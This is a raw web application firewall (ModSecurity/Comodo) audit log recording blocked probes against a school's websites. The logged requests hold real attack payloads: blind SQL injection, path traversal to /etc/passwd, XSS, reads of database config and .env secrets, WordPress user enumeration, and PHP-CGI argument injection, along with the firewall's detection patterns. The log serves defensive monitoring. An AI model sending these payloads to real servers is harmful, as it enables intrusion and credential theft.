[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175509833 3258 (- - -) Stopwatch2: 1748594175509833 3258; combined=1811, p1=423, p2=1361, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe9f225b-Z-- --acea2849-A-- [30/May/2025:15:36:16 +0700] aDluALW504ObxUT6RrwCCgAAAAo 103.236.140.4 35326 103.236.140.4 8181 --acea2849-B-- GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 --acea2849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acea2849-E-- --acea2849-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594176460357 2616 (- - -) Stopwatch2: 1748594176460357 2616; combined=668, p1=499, p2=140, p3=0, p4=0, p5=28, sr=93, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acea2849-Z-- --6aee715b-A-- [30/May/2025:15:36:16 +0700] aDluAIWl_OZMPH_FZ2Da1wAAANY 103.236.140.4 35328 103.236.140.4 8181 --6aee715b-B-- GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded --6aee715b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6aee715b-E-- --6aee715b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?sl=../../../../../../../etc/passwd%00"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748594176471496 2058 (- - -) Stopwatch2: 1748594176471496 2058; combined=523, p1=387, p2=110, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6aee715b-Z-- --7ac76b48-A-- [30/May/2025:15:36:21 +0700] aDluBZxu2QkuXt3B9jaf0gAAAJg 103.236.140.4 35348 103.236.140.4 8181 --7ac76b48-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 42 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded --7ac76b48-C-- var={"body":{"file":"file:///etc/passwd"}} --7ac76b48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ac76b48-E-- --7ac76b48-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /sys/ui/extend/varkind/custom.jsp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594181468106 1817 (- - -) Stopwatch2: 1748594181468106 1817; combined=659, p1=524, p2=102, p3=0, p4=0, p5=33, sr=224, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ac76b48-Z-- --d69ef366-A-- [30/May/2025:15:36:22 +0700] aDluBpxu2QkuXt3B9jaf1QAAAJc 103.236.140.4 35354 103.236.140.4 8181 --d69ef366-B-- GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240 --d69ef366-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d69ef366-E-- --d69ef366-H-- Message: Access denied with code 403 (phase 2). 
Pattern match ""] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594182472358 2553 (- - -) Stopwatch2: 1748594182472358 2553; combined=1096, p1=407, p2=661, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d69ef366-Z-- --bcf31507-A-- [30/May/2025:15:36:28 +0700] aDluDIWl_OZMPH_FZ2Da2QAAAMw 103.236.140.4 35358 103.236.140.4 8181 --bcf31507-B-- POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded --bcf31507-C-- "1":1 --bcf31507-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf31507-E-- --bcf31507-H-- Message: Access denied with code 403 (phase 2). Matched phrase "config/database.php" at ARGS:picUrl. 
[file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: config/database.php found within ARGS:picUrl: ../config/database.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594188463007 3035 (- - -) Stopwatch2: 1748594188463007 3035; combined=1600, p1=495, p2=1074, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf31507-Z-- --8616711f-A-- [30/May/2025:15:44:28 +0700] aDlv7IWl_OZMPH_FZ2Da3AAAANM 103.236.140.4 35408 103.236.140.4 8181 --8616711f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.75.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.75.145 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8616711f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8616711f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748594668590026 813 (- - -) Stopwatch2: 1748594668590026 813; combined=345, p1=306, p2=0, p3=0, p4=0, p5=38, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8616711f-Z-- --69eb256e-A-- [30/May/2025:16:42:13 +0700] aDl9dUCWxJfHX2QfsdXuhAAAAIE 103.236.140.4 39144 103.236.140.4 8181 --69eb256e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 195.116.155.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.116.155.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --69eb256e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69eb256e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748598133817907 3011 (- - -) Stopwatch2: 1748598133817907 3011; combined=1738, p1=617, p2=1081, p3=0, p4=0, p5=40, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69eb256e-Z-- --a9bb6a63-A-- [30/May/2025:17:39:40 +0700] aDmK7AYacg5Rp_mEAa2rAAAAAEQ 103.236.140.4 52282 103.236.140.4 8181 --a9bb6a63-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.97.201.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.97.201.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9bb6a63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9bb6a63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748601580673209 2174 (- - -) Stopwatch2: 1748601580673209 2174; combined=1040, p1=334, p2=678, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9bb6a63-Z-- --4170a61d-A-- [30/May/2025:18:00:00 +0700] aDmPsFIXp1x3knXz7CjOwgAAAAg 103.236.140.4 53798 103.236.140.4 8181 --4170a61d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 35.240.174.82 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 35.240.174.82 X-Forwarded-Proto: https Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --4170a61d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4170a61d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748602800366920 883 (- - -) Stopwatch2: 1748602800366920 883; combined=356, p1=315, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4170a61d-Z-- --6a3cda5d-A-- [30/May/2025:18:24:24 +0700] aDmVaECWxJfHX2QfsdX3gQAAAIg 103.236.140.4 56674 103.236.140.4 8181 --6a3cda5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 64.227.161.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 64.227.161.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6a3cda5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a3cda5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748604264929081 2489 (- - -) Stopwatch2: 1748604264929081 2489; combined=1357, p1=438, p2=887, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a3cda5d-Z-- --be447066-A-- [30/May/2025:19:06:44 +0700] aDmfVHC_Owo8zPtYGR1SGgAAAMo 103.236.140.4 59502 103.236.140.4 8181 --be447066-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.19.19 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --be447066-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be447066-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748606804969007 713 (- - -) Stopwatch2: 1748606804969007 713; combined=275, p1=240, p2=0, p3=0, p4=0, p5=35, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be447066-Z-- --296bef7b-A-- [30/May/2025:19:15:10 +0700] aDmhTnC_Owo8zPtYGR1SRQAAAMo 103.236.140.4 60078 103.236.140.4 8181 --296bef7b-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 165.227.84.14 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 165.227.84.14 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --296bef7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --296bef7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748607310224338 826 (- - -) Stopwatch2: 1748607310224338 826; combined=301, p1=272, p2=0, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --296bef7b-Z-- --a237782b-A-- [30/May/2025:19:42:34 +0700] aDmnulIXp1x3knXz7CjQ7QAAAAI 103.236.140.4 33614 103.236.140.4 8181 --a237782b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a237782b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a237782b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748608954202709 775 (- - -) Stopwatch2: 1748608954202709 775; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a237782b-Z-- --f25abf7a-A-- [30/May/2025:19:42:36 +0700] aDmnvFIXp1x3knXz7CjQ7wAAAAw 103.236.140.4 33620 103.236.140.4 8181 --f25abf7a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f25abf7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f25abf7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748608956979681 713 (- - -) Stopwatch2: 1748608956979681 713; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f25abf7a-Z-- --28d0e469-A-- [30/May/2025:19:53:34 +0700] aDmqTlIXp1x3knXz7CjRuwAAABY 103.236.140.4 35300 103.236.140.4 8181 --28d0e469-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.26.57.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.26.57.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --28d0e469-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28d0e469-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748609614375699 3012 (- - -) Stopwatch2: 1748609614375699 3012; combined=1404, p1=526, p2=842, p3=0, p4=0, p5=36, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28d0e469-Z-- --0aada826-A-- [30/May/2025:20:01:52 +0700] aDmsQAYacg5Rp_mEAa2sygAAAFY 103.236.140.4 38044 103.236.140.4 8181 --0aada826-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 111.160.79.114 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 111.160.79.114 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --0aada826-C-- --0aada826-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0aada826-E-- --0aada826-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748610112153222 4383 (- - -) Stopwatch2: 1748610112153222 4383; combined=3135, p1=492, p2=2546, p3=0, p4=0, p5=97, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0aada826-Z-- --3250576c-A-- [30/May/2025:21:07:46 +0700] aDm7snC_Owo8zPtYGR1YsQAAANg 103.236.140.4 37744 103.236.140.4 8181 --3250576c-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.1.225 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.1.225 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3250576c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3250576c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748614066335007 908 (- - -) Stopwatch2: 1748614066335007 908; combined=358, p1=316, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
